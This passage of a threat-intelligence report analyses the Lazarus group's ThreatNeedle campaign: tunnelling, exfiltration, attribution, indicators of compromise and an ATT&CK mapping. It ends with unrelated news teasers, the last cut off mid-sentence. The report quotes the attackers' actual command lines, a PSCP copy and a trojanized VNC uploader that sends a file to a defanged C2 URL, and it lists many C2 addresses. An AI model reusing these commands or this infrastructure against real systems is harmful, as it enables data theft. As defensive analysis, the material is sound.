The attackers also ran the nmap utility on the router VM and scanned ports on systems within the restricted segment of the enterprise network. On September 27, the attackers started removing all traces of their activity from the router, using the logrotate utility to set up automatic deletion of log files.

Webmin log

Exfiltration

We observed that the malware operator attempted to create SSH tunnels to a remote server located in South Korea from several compromised server hosts. They used a custom tunneling tool to achieve this. The tool receives four parameters: client IP address, client port, server IP address and server port. The tool offers basic functionality, forwarding client traffic to the server. In order to create a covert channel, the malware encrypts forwarded traffic using trivial binary encryption.

Encryption routine

Using the covert channel, the adversary copied data from the remote server over to the host using the PuTTy PSCP tool:

• %APPDATA%\PBL\unpack.tmp  -pw [password] root@[IP address]:/tmp/cab0215 %APPDATA%\PBL\cab0215.tmp

After copying data from the server, the actor utilized the custom tool to exfiltrate stolen data to the remote server. This malware looks like a legitimate VNC client and runs like one if it’s executed without any command line parameters.

Execution of malware without parameters

However, if this application is executed with specific command line parameters, it runs an alternate, malicious function. According to our telemetry, the actor executed this application with six parameters:

• %APPDATA%\Comms\Comms.dat S0RMM-50QQE-F65DN-DCPYN-5QEQA hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp %APPDATA%\Comms\cab59.tmp FL0509 15000

Also, if the number of command line parameters is greater than six, the malware jumps into a malicious routine. The malware also checks the length of the second argument – if it’s less than 29 characters, it terminates the execution. When the parameter checking procedure has passed successfully, the malware starts to decrypt its next payload.

The embedded payload gets decrypted via XOR, where each byte from the end of the payload gets applied to the preceding byte. Next, the XORed blob receives the second command line argument that’s provided (in this case S0RMM-50QQE-F65DN-DCPYN-5QEQA). The malware can accept more command line arguments, and depending on its number it runs differently. For example, it can also receive proxy server addresses with the “-p” option.

When the decrypted in-memory payload is executed, it compares the header of the configuration data passed with the string “0x8406” in order to confirm its validity. The payload opens a given file (in this example %APPDATA%\Comms\cab59.tmp) and starts exfiltrating it to the remote server. When the malware uploads data to the C2 server, it uses HTTP POST requests with two parameters named ‘fr’ and ‘fp’:

• The ‘fr’ parameter contains the file name from the command line argument to upload.
• The ‘fp’ parameter contains the base64 encoded size, CRC32 value of content and file contents.

Contents of fp parameter

Attribution

We have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware cluster is attributed only to the Lazarus group. During this investigation, we were able to find connections to several clusters of the Lazarus group.

Connections between Lazarus campaigns

Connection with DeathNote cluster

During this investigation we identified several connections with the DeathNote (a.k.a. Operation Dream Job) cluster of the Lazarus group. First of all, among the hosts infected by the ThreatNeedle malware, we discovered one that was also infected with the DeathNote malware, and both threats used the same C2 server URLs.

In addition, while analyzing the C2 server used in this attack, we found a custom web shell script that was also discovered on the DeathNote C2 server. We also identified that the server script corresponding to the Trojanized VNC Uploader was found on the DeathNote C2 server.

Although DeathNote and this incident show different TTPs, both campaigns share command and control infrastructure and some victimology.

Connection with Operation AppleJeus

We also found a connection with Operation AppleJeus. As we described, the actor used a homemade tunneling tool in the ThreatNeedle campaign that has a custom encryption routine to create a covert channel. This very same tool was utilized in operation AppleJeus as well.

Same tunneling tool

Connection with Bookcode cluster

In our previous blog about Lazarus group, we mentioned the Bookcode cluster attributed to Lazarus group; and recently the Korea Internet and Security Agency (KISA) also published a report about the operation. In the report, they mentioned a malware cluster named LPEClient used for profiling hosts and fetching next stage payloads. While investigating this incident, we also found LPEClient from the host infected with ThreatNeedle. So, we assess that the ThreatNeedle cluster is connected to the Bookcode operation.

Conclusions

In recent years, the Lazarus group has focused on attacking financial institutions around the world. However, beginning in early 2020, they focused on aggressively attacking the defense industry. While Lazarus has also previously utilized the ThreatNeedle malware used in this attack when targeting cryptocurrency businesses, it is currently being actively used in cyberespionage attacks.

This investigation allowed us to create strong ties between multiple campaigns that Lazarus has conducted, reinforcing our attribution. In this campaign the Lazarus group demonstrated its sophistication level and ability to circumvent the security measures they face during their attacks, such as network segmentation. We assess that Lazarus is a highly prolific group, conducting several campaigns using different strategies. They shared tools and infrastructure among these campaigns to accomplish their goals.

Appendix I – Indicators of Compromise

Malicious documents

e7aa0237fc3db67a96ebd877806a2c88 Boeing_AERO_GS.docx

Installer

b191cc4d73a247afe0a62a8c38dc9137 %APPDATA%\Microsoft\DRM\logon.bin 9e440e231ef2c62c78147169a26a1bd3 C:\ProgramData\ntnser.bin b7cc295767c1d8c6c68b1bb6c4b4214f C:\ProgramData\ntnser.bin 0f967343e50500494cf3481ce4de698c C:\ProgramData\Microsoft\MSDN\msdn.bin 09aa1427f26e7dd48955f09a9c604564 %APPDATA\Microsoft\info.dat 07b22533d08f32d48485a521dbc1974d C:\ProgramData\adobe\load.dat 1c5e4d60a1041cf2903817a31c1fa212 C:\ProgramData\Adobe\adobe.tmp 4cebc83229a40c25434c51ee3d6be13e C:\ProgramData\Adobe\up.tmp 23b04b18c75aa7d286fea5d28d41a830 %APPDATA%\Microsoft\DRM\logon.dat 319ace20f6ffd39b7fff1444f73c9f5d %APPDATA%\Microsoft\DRM\logon.bin 45c0a6e13cad26c69eff59fded88ef36 %APPDATA%\Microsoft\DRM\logon.dat 486f25db5ca980ef4a7f6dfbf9e2a1ad C:\ProgramData\ntusers.dat 1333967486d3ab50d768fb745dae9af5 C:\PerfLogs\log.bin 07b22533d08f32d48485a521dbc1974d C:\ProgramData\Adobe\load.dat c86d0a2fa9c4ef59aa09e2435b4ab70c %TEMP%\ETS4659.tmp 69d71f06fbfe177fb1a5f57b9c3ae587 %APPDATA%\Microsoft\Windows\shsvcs.db 7bad67dcaf269f9ee18869e5ef6b2dc1   956e5138940a4f44d1c2c24f122966bd %APPDATA%\ntuser.bin

Loader

ed627b7bbf7ea78c343e9fb99783c62b   1a17609b7df20dcb3bd1b71b7cb3c674 %ALLUSERSPROFILE%\ntuser.bin fa9635b479a79a3e3fba3d9e65b842c3   3758bda17b20010ff864575b0ccd9e50 %SYSTEMROOT%\system\mraudio.drv cbcf15e272c422b029fcf1b82709e333 %SYSTEMROOT%\system\mraudio.drv 9cb513684f1024bea912e539e482473a   36ab0902797bd18acd6880040369731c %SYSTEMROOT%\LogonHours.sys db35391857bcf7b0fa17dbbed97ad269 %ALLUSERSPROFILE%\Adobe\update.tmp be4c927f636d2ae88a1e0786551bf3c4 %ALLUSERSPROFILE%\Adobe\unpack.tmp 728948c66582858f6a3d3136c7fbe84a %APPDATA%\Microsoft\IBM.DAT 06af39b9954dfe9ac5e4ec397a3003fb   29c5eb3f17273383782c716754a3025a   79d58b6e850647024fea1c53e997a3f6   e604185ee40264da4b7d10fdb6c7ab5e   2a73d232334e9956d5b712cc74e01753   1a17609b7df20dcb3bd1b71b7cb3c674 %ALLUSERSPROFILE%\ntuser.bin 459be1d21a026d5ac3580888c8239b07 %ALLUSERSPROFILE%\ntuser.bin 87fb7be83eff9bea0d6cc95d68865564 %SYSTEMROOT%\SysWOW64\wmdmpmsp.sys 062a40e74f8033138d19aa94f0d0ed6e %APPDATA%\microsoft\OutIook.db 9b17f0db7aeff5d479eaee8056b9ac09 %TEMP%\ETS4658.tmp, %APPDATA%\Temp\BTM0345.tmp 9b17f0db7aeff5d479eaee8056b9ac09 %APPDATA%\Temp\BTM0345.tmp 420d91db69b83ac9ca3be23f6b3a620b   238e31b562418c236ed1a0445016117c %APPDATA%\Microsoft\Windows\lconcaches.db, %TEMP%\cache.db 36ab0902797bd18acd6880040369731c   238e31b562418c236ed1a0445016117c %TEMP%\cache.db, %APPDATA%\Microsoft\Windows\lconcaches.db ad1a93d6e6b8a4f6956186c213494d17 %APPDATA%\Microsoft\Windows\shsvcs.db c34d5d2cc857b6ee9038d8bb107800f1  

Registry Loader

16824dfd4a380699f3841a6fa7e52c6d   aa74ed16b0057b31c835a5ef8a105942   85621411e4c80897c588b5df53d26270 %SYSTEMROOT%\system\avimovie.dll a611d023dfdd7ca1fab07f976d2b6629   160d0e396bf8ec87930a5df46469a960 %WINDIR%\winhelp.dll 110e1c46fd9a39a1c86292487994e5bd  

Downloader

ac86d95e959452d189e30fa6ded05069 %APPDATA%\Microsoft\thumbnails.db

Trojanized VNC Uploader

bea90d0ef40a657cb291d25c4573768d %ALLUSERSPROFILE%\adobe\arm86.dat 254a7a0c1db2bea788ca826f4b5bf51a %APPDATA%\PBL\user.tmp, %APPDATA%\Comms\Comms.dat

Tunneling Tool

6f0c7cbd57439e391c93a2101f958ccd %APPDATA\PBL\update.tmp fc9e7dc13ce7edc590ef7dfce12fe017  

LPEClient

0aceeb2d38fe8b5ef2899dd6b80bfc08 %TEMP%\ETS5659.tmp 09580ea6f1fe941f1984b4e1e442e0a5 %TEMP%\ETS4658.tmp

File path
%SYSTEMROOT%\system32\bcdbootinfo.tlp
%SYSTEMROOT%\system32\Nwsapagent.sys
%SYSTEMROOT%\system32\SRService.sys
%SYSTEMROOT%\system32\NWCWorkstation.sys
%SYSTEMROOT%\system32\WmdmPmSp.sys
%SYSTEMROOT%\system32\PCAudit.sys
%SYSTEMROOT%\system32\helpsvc.sys

Registry Path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig – Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig – SubVersion

Domains and IPs
hxxp://forum.iron-maiden[.]ru/core/cache/index[.]php
hxxp://www.au-pair[.]org/admin/Newspaper[.]asp
hxxp://www.au-pair[.]org/admin/login[.]asp
hxxp://www.colasprint[.]com/_vti_log/upload[.]asp
hxxp://www.djasw.or[.]kr/sub/popup/images/upfiles[.]asp
hxxp://www.kwwa[.]org/popup/160307/popup_160308[.]asp
hxxp://www.kwwa[.]org/DR6001/FN6006LS[.]asp
hxxp://www.sanatoliacare[.]com/include/index[.]asp
hxxps://americanhotboats[.]com/forums/core/cache/index[.]php
hxxps://docentfx[.]com/wp-admin/includes/upload[.]php
hxxps://kannadagrahakarakoota[.]org/forums/admincp/upload[.]php
hxxps://polyboatowners[.]com/2010/images/BOTM/upload[.]php
hxxps://ryanmcbain[.]com/forum/core/cache/upload[.]php
hxxps://shinwonbook.co[.]kr/basket/pay/open[.]asp
hxxps://shinwonbook.co[.]kr/board/editor/upload[.]asp
hxxps://theforceawakenstoys[.]com/vBulletin/core/cache/upload[.]php
hxxps://www.automercado.co[.]cr/empleo/css/main[.]jsp
hxxps://www.curiofirenze[.]com/include/inc-site[.]asp
hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php
hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php
hxxps://www.dronerc[.]it/forum/uploads/index[.]php
hxxps://www.dronerc[.]it/shop_testbr/Adapter/Adapter_Config[.]php
hxxps://www.edujikim[.]com/intro/blue/view[.]asp
hxxps://www.edujikim[.]com/pay/sample/INIstart[.]asp
hxxps://www.edujikim[.]com/smarteditor/img/upload[.]asp
hxxps://www.fabioluciani[.]com/ae/include/constant[.]asp
hxxps://www.fabioluciani[.]com/es/include/include[.]asp
hxxp://www.juvillage.co[.]kr/img/upload[.]asp
hxxps://www.lyzeum[.]com/board/bbs/bbs_read[.]asp
hxxps://www.lyzeum[.]com/images/board/upload[.]asp
hxxps://martiancartel[.]com/forum/customavatars/avatars[.]php
hxxps://www.polyboatowners[.]com/css/index[.]php
hxxps://www.sanlorenzoyacht[.]com/newsl/include/inc-map[.]asp
hxxps://www.raiestatesandbuilders[.]com/admin/installer/installer/index[.]php
hxxp://156.245.16[.]55/admin/admin[.]asp
hxxp://fredrikarnell[.]com/marocko2014/index[.]php
hxxp://roit.co[.]kr/xyz/mainpage/view[.]asp

Second stage C2 address
hxxps://www.waterdoblog[.]com/uploads/index[.]asp
hxxp://www.kbcwainwrightchallenge.org[.]uk/connections/dbconn[.]asp

C2 URLs to exfiltrate files used by Trojanized VNC Uploader
hxxps://prototypetrains[.]com:443/forums/core/cache/index[.]php
hxxps://newidealupvc[.]com:443/img/prettyPhoto/jquery.max[.]php
hxxps://mdim.in[.]ua:443/core/cache/index[.]php
hxxps://forum.snowreport[.]gr:443/cache/template/upload[.]php
hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp
hxxps://www.dellarocca[.]net/it/content/img/img[.]asp
hxxps://www.astedams[.]it/photos/image/image[.]asp
hxxps://www.geeks-board[.]com/blog/wp-content/uploads/2017/cache[.]php
hxxps://cloudarray[.]com/images/logo/videos/cache[.]jsp

Appendix II – MITRE ATT&CK Mapping Tactic Technique Technique Name Initial Access T1566.002 Phishing: Spearphishing Link Execution T1059.003
T1204.002
T1569.002 Command and Scripting Interpreter: Windows Command Shell
User Execution: Malicious File
System Services: Service Execution Persistence T1543.003
T1547.001 Create or Modify System Process: Windows Service
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder Privilege Escalation T1543.003 Create or Modify System Process: Windows Service Defense Evasion T1140
T1070.002
T1070.003
T1070.004
T1036.003
T1036.004
T1112 Deobfuscate/Decode Files or Information
Clear Linux or Mac System Logs
Clear Command History
File Deletion
Masquerading: Rename System Utilities
Masquerading: Masquerade Task or Service
Modify Registry Credential Access T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay Discovery T1135
T1057
T1016
T1033
T1049
T1082
T1083
T1007 Network Share Discovery
Process Discovery
System Network Configuration Discovery
System Owner/User Discovery
System Network Connections Discovery
System Information Discovery
File and Directory Discovery
System Service Discovery Lateral Movement T1021.002 SMB/Windows Admin Shares Collection T1560.001 Archive Collected Data: Archive via Utility Command and Control T1071.001
T1132.002
T1104
T1572
T1090.001 Application Layer Protocol: Web Protocols
Non-Standard Encoding
Multi-Stage Channels
Protocol Tunneling
Internal Proxy Exfiltration T1041 Exfiltration Over C2 Channel

Quickbooks malware targets tax data for attackers to sell and use in phishing scams.

Mozilla said its Total Cookie Protection feature in Firefox 86 prevents invasive, cross-site cookie tracking.

VMware has addressed multiple critical remote code execution (RCE) vulnerabilities in VMware ESXi and vSphere Client virtual infrastructure management platform that may allow attackers to execute arbitrary commands and take control of affected systems. "A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying